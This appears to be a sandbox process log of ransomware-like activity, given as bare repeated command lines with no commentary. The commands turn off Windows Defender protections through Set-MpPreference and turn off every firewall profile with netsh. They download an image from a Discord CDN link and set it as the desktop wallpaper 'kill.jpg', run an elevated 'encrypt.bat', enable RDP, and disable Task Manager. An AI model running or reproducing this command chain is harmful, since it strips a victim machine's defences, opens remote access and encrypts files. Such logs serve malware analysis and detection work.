powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

